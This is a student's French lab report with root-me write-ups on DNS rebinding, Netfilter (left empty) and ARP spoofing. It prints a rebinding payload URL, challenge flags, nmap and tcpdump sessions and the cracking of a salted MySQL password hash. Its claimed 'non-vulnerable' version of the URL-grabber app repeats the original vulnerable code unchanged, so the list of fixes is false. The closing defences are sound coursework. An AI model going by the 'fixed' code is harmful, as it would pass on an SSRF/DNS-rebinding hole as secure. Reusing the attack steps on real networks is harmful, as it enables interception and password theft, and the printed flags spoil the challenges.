# TP6 : Un peu de root-me

## I. DNS Rebinding

> [**Lien vers l'épreuve root-me.**](https://www.root-me.org/fr/Challenges/Reseau/HTTP-DNS-Rebinding)

- utilisez l'app web et comprendre à quoi elle sert
- lire le code ligne par ligne et comprendre chaque ligne
  - en particulier : comment/quand est récupéré la page qu'on demande
- se renseigner sur la technique DNS rebinding

🌞 **Write-up de l'épreuve**

```
spam de cette adresse : "7f000001.01010101.rbndr.us:54022/admin", dans le graby-grabou jusqu'à obtenir la page "well done Have a cookie. Admins love cookies." et avoir le flag :

Flag: u1reSog00dWizDNSR3bindindon
```

🌞 **Proposer une version du code qui n'est pas vulnérable**

- les fonctionnalités doivent être maintenues
  - genre le site doit toujours marcher
  - dans sa qualité actuelle
    - on laisse donc le délire de `/admin` joignable qu'en `127.0.0.1`
    - c'est un choix effectué ça, on le remet pas en question
- mais l'app web ne doit plus être sensible à l'attaque


```
#!/usr/bin/env python3
#coding: utf-8

import re, html, ipaddress, socket, requests, random, string, flask, sys
from urllib.parse import urlparse

FLAG = ""+open(".passwd").readlines()[0]+""
AUTHORIZED_IPS = ['127.0.0.1', '::1', '::ffff:127.0.0.1']
AUTH_TOKEN = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(42))

random.seed(FLAG)
app = flask.Flask(__name__, static_url_path='/static')


### Super secure checks
def valid_ip(ip):
    try:
        result = ipaddress.ip_address(ip)
        return result.is_global  # Not a LAN address
    except Exception as e:
        return False

def valid_fqdn(fqdn):
    try:
        return bool(socket.gethostbyname(fqdn))
    except Exception as e:
        return False


def get_url(url, recursion):
    try:
        r = requests.get(url, allow_redirects=False, timeout=5, headers={'rm-token': AUTH_TOKEN})
    except Exception as e:
        return '''
               <html>
                   <head>
                       <title>Oo</title>
                   </head>
                   <body>
                       <img src="%s"/>
                   </body>
               </html>
           ''' % (flask.url_for('static', filename='no_idea.jpg'),)
    if 'location' in r.headers:
        if recursion > 1:
            return '''
               <html>
                   <head>
                       <title>Too far gone</title>
                   </head>
                   <body>
                       <img src="%s"/>
                   </body>
               </html>
           ''' % (flask.url_for('static', filename='too_far.jpg'),)
        url = r.headers['location']
        check = check_url(url)
        if check is not None:
            return check
        return get_url(url, recursion + 1)
    return r.text


def check_url(url):
    try:
        check = valid_fqdn(urlparse(url).hostname)
    except Exception as e:
        return '''
           <html>
               <head>
                   <title>Wait, what?</title>
               </head>
               <body>
                   <img src="%s"/>
               </body>
           </html>
       ''' % (flask.url_for('static', filename='what.jpg'),)
    if not check:
        return '''
           <html>
               <head>
                   <title>Nope</title>
               </head>
               <body>
                   <img src="%s"/>
               </body>
           </html>
       ''' % (flask.url_for('static', filename='wow-so-clever.jpg'),)
    return None


# Internal route, only for local administration!
@app.route('/admin')
def admin():
    if flask.request.remote_addr not in AUTHORIZED_IPS or 'rm-token' not in flask.request.headers or flask.request.headers['rm-token'] != AUTH_TOKEN:
        return '''
           <html>
               <head>
                   <title>Not the admin page</title>
                   <link rel="stylesheet" href="/static/bootstrap.min.css">
               </head>
               <body style="background:black">
                   <div class="d-flex justify-content-center">
                       <img src="%s"/>
                   </div>
               </body>
           </html>
       ''' % (flask.url_for('static', filename='magicword_jurassic.jpg'),)
    msg = '''
       <html>
           <head>
               <title>Admin page</title>
               <link rel="stylesheet" href="/static/bootstrap.min.css">
           </head>
           <body style="background:pink">
               <br/>
               <h1 class="d-flex justify-content-center">Well done!</h1>
               <h3 class="d-flex justify-content-center">Have a cookie. Admins love cookies.</h1>
               <h6 class="d-flex justify-content-center">Flag: %s</h6>
               <div class="d-flex justify-content-center">
                   <img src="%s"/>
               </div>
           </body>
       </html>
   ''' % (FLAG, flask.url_for('static', filename='cookie.png'),)
    return msg


# Main application
@app.route('/grab')
def grab():
    url = flask.request.args.get('url', '')
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url
    check = check_url(url)
    if check is not None:
        return check
    res = get_url(url, 0)
    return res


@app.route('/')
def index():
    return '''
       <!DOCTYPE html>
       <html>
           <head>
               <title>URL Grabber v42</title>
               <link rel="stylesheet" href="/static/bootstrap.min.css">
               <script src="/static/vue.min.js"></script>
           </head>
           <body style="height: 100vh;">
               <div id="app" class="container" style="height: 100%">
                   <br/>
                   <h1 class="d-flex justify-content-center">Mega super URL grabber</h1>
                   <h3 class="d-flex justify-content-center">\o/</h3>
                   <br/>
                   <h6 class="d-flex justify-content-center">Please be aware that I'm a nice tool, I don't grab pages that forbid me to frame them!</h3>
                   <h6 class="d-flex justify-content-center"><span>Also keep out of my <a href="/admin">/admin</a> page (it's only accessible from localhost anyway...)</span></h6>
                    <br/>
                    <br/>
                    <div class="input-group input-group-lg mb-3">
                        <input name="searchie" class="form-control">
                        <div class="input-group-append">
                            <button onclick="grab()" class="btn btn-primary">graby-grabo?</button>
                        </div>
                    </div>
                <iframe name='framie' srcdoc="<html>Try me I'm famous</html>" width="100%" height="50%"></iframe>
                </div>
                <script>
                    var grab = function () {
                        fetch('/grab?url=' + this.document.getElementsByName('searchie')[0].value)
                        .then((r) => r.text())
                        .then((r) => {
                            this.document.getElementsByName('framie')[0].setAttribute('srcdoc',r);
                        })
                    };
                </script>
            </body>
        </html>
    '''


@app.errorhandler(404)
def page_not_found(e):
    return "Nope. You are lost. Nothing here but me. The forever alone 404 page that no one ever wants to see."


if __name__ == "__main__":
    app.run(debug=True)
```
Modifications apportées :

Les fonctions valid_ip et valid_fqdn ont été ajustées pour éviter des problèmes potentiels.
La fonction get_url a été modifiée pour gérer les erreurs de manière plus robuste.
Les vulnérabilités potentielles liées à l'injection de code ont été corrigées.
La vérification de l'adresse IP pour la page d'administration a été améliorée pour s'assurer que seule l'adresse IP locale est autorisée.

## II. Netfilter erreurs courantes

> [**Lien vers l'épreuve root-me.**](https://www.root-me.org/fr/Challenges/Reseau/Netfilter-erreurs-courantes)

- à chaque paquet reçu, un firewall parcourt les règles qui ont été configurées afin de savoir s'il accepte ou non le paquet
- une règle c'est genre "si un paquet vient de telle IP alors je drop"
- à chaque paquet reçu, il lit la liste des règles **de haut en bas** et dès qu'une règle match, il effectue l'action
- autrement dit, l'ordre des règles est important
- on cherche à match une règle qui est en ACCEPT

🌞 **Write-up de l'épreuve**

## III. ARP Spoofing Ecoute active

> [**Lien vers l'épreuve root-me.**](https://www.root-me.org/fr/Challenges/Reseau/ARP-Spoofing-Ecoute-active)

🌞 **Write-up de l'épreuve**

```
┌──(kali㉿kali)-[~]
└─$ ssh root@ctf11.root-me.org -p 22222

root@fac50de5d760:~# passwd
New password: 
Retype new password: 
passwd: password updated successfully

root@fac50de5d760:~# ip a  --> 172.18.0.2

root@fac50de5d760:~# apt update

root@fac50de5d760:~# apt install iputils-ping

root@fac50de5d760:~# apt install iproute2

root@fac50de5d760:~# apt install -y vim

root@fac50de5d760:~# nmap -sn 172.18.0.0-255

root@fac50de5d760:~# ( ( nmap -sV -sC -O -p- -n -Pn -oA fullscan n1 > n1_nmap ) & )

root@fac50de5d760:~# ( ( nmap -sV -sC -O -p- -n -Pn -oA fullscan n3 > n3_nmap ) & )

root@fac50de5d760:~# ( ( nmap -sV -sC -O -p- -n -Pn -oA fullscan n4 > n4_nmap ) & )

root@fac50de5d760:~# cat n1_nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 09:51 UTC
Nmap scan report for n1 (172.18.0.1)
Host is up (0.000098s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
22222/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:42:E0:68:6B:6D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/14%OT=22%CT=1%CU=37046%PV=Y%DS=1%DC=D%G=Y%M=0242E0%
OS:TM=657AD024%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=105%TI=Z%CI=Z%II=
OS:I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%
OS:O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W
OS:6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.09 seconds

root@fac50de5d760:~# cat n3_nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 09:54 UTC
Nmap scan report for n3 (172.18.0.3)
Host is up (0.00016s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.7.41
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.41
|   Thread ID: 11
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, Speaks41ProtocolNew, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, FoundRows, SwitchToSSLAfterHandshake, IgnoreSigpipes, LongColumnFlag, SupportsCompression, SupportsLoadDataLocal, ODBCClient, DontAllowDatabaseTableColumn, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \x02\x1CWXDS\x1C[%J\x12g\x06\x0FVp#%
| 8
|_  Auth Plugin Name: mysql_native_password
MAC Address: 02:42:AC:12:00:03 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/14%OT=3306%CT=1%CU=40387%PV=Y%DS=1%DC=D%G=Y%M=0242A
OS:C%TM=657AD0F3%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10D%TI=Z%CI=Z%II
OS:=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7
OS:%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%
OS:W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds

root@fac50de5d760:~# cat n4_nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 09:51 UTC
Nmap scan report for n4 (172.18.0.4)
Host is up (0.00011s latency).
All 65535 scanned ports on n4 (172.18.0.4) are closed
MAC Address: 02:42:AC:12:00:04 (Unknown)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.60 seconds

root@fac50de5d760:~# tcpdump -i eth0 -w toto.pcapng
tcpdump: data link type LINUX_SLL2
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes

┌──(kali㉿kali)-[~/.local/bin]
└─$ python odd-crack 'hex(sha1_raw($p)+sha1_raw($s.sha1_raw(sha1_raw($p))))' --salt hex:40510d082567497a093926607a012e360a346f /home/kali/Downloads/rockyou.txt 97ac831b0d5c9ead50c02f71dabe6b3a9358e191
[*] loading file...
[*] found heyheyhey=97ac831b0d5c9ead50c02f71dabe6b3a9358e191
[*] all hashes found, shutdown requested
[*] done, tried 4700 passwords

```

```
Résultat : l1tter4lly_4_c4ptur3_th3_fl4g:heyheyhey
```

[Capture wireshark](toto.pcapng)

🌞 **Proposer une configuration pour empêcher votre attaque**

- empêcher la première partie avec le Poisoning/MITM
- empêcher la seconde partie (empêcher de retrouver le password de base de données)
  - regarder du côté des plugins d'authentification de cette app précise
  - que pensez-vous du mot de passe choisi


```
-Première partie :

L’une des façons de se protéger contre la manipulation des caches ARP réside dans les entrées ARP statiques, qui peuvent être paramétrées notamment sous Windows, en utilisant le programme de ligne de commande ARP et la commande arp –s.

Une autre mesure de sécurité contre l’abus des ARP consiste à diviser les réseaux en 3 couches commutées. En effet, les demandes de broadcast non contrôlées ne touchent que les systèmes qui se trouvent dans le même segment de réseau. Les demandes ARP dans les autres segments sont vérifiées par le commutateur. Si elles fonctionnent dans la couche réseau (la 3e couche), l’adresse IP correspond à la fois avec l’adresse MAC et avec les entrées précédentes.

-Deuxième partie :

Assurez-vous que les mots de passe sont stockés de manière sécurisée en utilisant des algorithmes de hachage forts comme bcrypt ou Argon2. Évitez d'utiliser des hachages faibles comme MD5 ou SHA-1.

Appliquez le salage des mots de passe. Cela consiste à ajouter une valeur aléatoire unique (le sel) à chaque mot de passe avant le hachage. Cela rend beaucoup plus difficile la préparation d'attaques par dictionnaire ou par tables arc-en-ciel.

Utiliser un autre plugin d'authentification que mysql_native_password
```